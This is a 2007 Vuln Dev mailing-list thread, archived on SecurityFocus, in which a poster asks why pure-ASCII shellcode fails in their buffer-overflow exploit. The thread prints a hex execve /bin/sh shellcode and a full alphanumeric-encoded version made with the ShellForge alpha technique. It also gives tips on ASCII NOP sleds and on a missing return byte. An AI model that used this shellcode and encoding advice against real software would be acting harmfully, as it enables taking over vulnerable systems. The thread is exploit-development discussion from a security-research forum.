Vuln Dev
Re: Re: Linux restricted ASCII Shellcode Apr 22 2007 10:42AM
nonexistant nospam org (2 replies)
Re: Linux restricted ASCII Shellcode Apr 23 2007 07:58AM
shadown (shadown gmail com) (1 replies)
Re: Linux restricted ASCII Shellcode Apr 23 2007 08:51AM
shadown (shadown gmail com)
I forgot at the end of that string goes a '\xc3' ->
'hAAAAX5AAAAHPPPPPPPPah4A00X5ZnCXPh0A00X50nRYPTYIII19hAA00X5Vb00PTY19hA0
A0X5fpsOPTY19II19I19h0AA0X5OpeFPTY19II19I19h004AX5Bf8sPTY19I19II19h4040X
58Bz8PTYII19h4520X58z9FPTY19I19I19I19h0000X5v7FvPTYI19I19h0AE0X58pzGPTY1
9II19hE000X5ZnFFPTYI19I19h555AX5ZZZUPTY19T\xc3'
this is the ShellForge alpha encoding technique.
btw: metasploit encoding should work that indeed is a better solution
that the one above.

Cheers,
Sergio

shadown wrote:
> Hi,
>
> Here you have you shellcode in ascii format.
>
> 'hAAAAX5AAAAHPPPPPPPPah4A00X5ZnCXPh0A00X50nRYPTYIII19hAA00X5Vb00PTY19hA0
A0X5fpsOPTY19II19I19h0AA0X5OpeFPTY19II19I19h004AX5Bf8sPTY19I19II19h4040X
58Bz8PTYII19h4520X58z9FPTY19I19I19I19h0000X5v7FvPTYI19I19h0AE0X58pzGPTY1
9II19hE000X5ZnFFPTYI19I19h555AX5ZZZUPTY19T'
>
> If the code you are trying to exploit does NOT allow nonASCII nops (that
> actually is the only thing that makes sence) instead of '\x90' you will
> have to use some ascii opcode/bytecode string that can be used as NOP
> sled (for example 'A' -> inc ecx).
>
> Cheers,
> Sergio
>
> nonexistant (at) nospam (dot) org [email concealed] wrote:
>> Yes I'm having a seg-fault, but I can't catch you...
>>
>> AFAIK when EIP is pointing somewhere in the NOP sled, no matter how the shellcode is aligned... Alignment has nothing to do here...?¿? I'm wrong?
>>
>> More over, I've tryed more than 5 different ASCII shellcodes all with the same result... Always segfaulting. It looks as if shellcodes where not working for any common reason...
>>
>> So, summarizing:
>>
>> 1.- I can perfectly overwrite RET thus having EIP pointing almost 100% of the time to the NOP's of my shellcode (in an environment variable)
>>
>> 2.- My -non-ascii- shellcode works perfectly
>>
>> 3.- Whn I try with ANY pure ascii shellcode, it fails 100% of the time.
>>
>>
>> What is happening?
>>
>>
>> I've tryed with pure ASCII shellcodes ripped from http://shellcode.org/Shellcode/linux/ascii/ among others...
>>
>>
>> Metasploit framework failed to convert the original shellcode -the one that works- to pure ascii with the selected charset (A-Z,a-z,0-9).
>>
>>
>> That's the original shellcode:
>>
>>
>> \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3
\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff
\xff\xff/bin/sh
>>
>>
>> Is anyone able to convert this to pure ASCII or giving me a working pure ASCII shellcode or helping me understand why all the pure ascii shellcodes are failing in my exploit?
>>
>>
>> Thank you,
>>
>

--
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown (at) gmail (dot) com [email concealed]

This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure. If you have
received it by mistake please let us know by e-mail immediately and
delete it from your system; should also not copy the message nor
disclose its contents to anyone. Many thanks.

[ reply ]
Re: Re: Linux restricted ASCII Shellcode Apr 23 2007 03:56AM
Deian Stefan (deianstefan gmail com)


 

Privacy Statement
Copyright 2010, SecurityFocus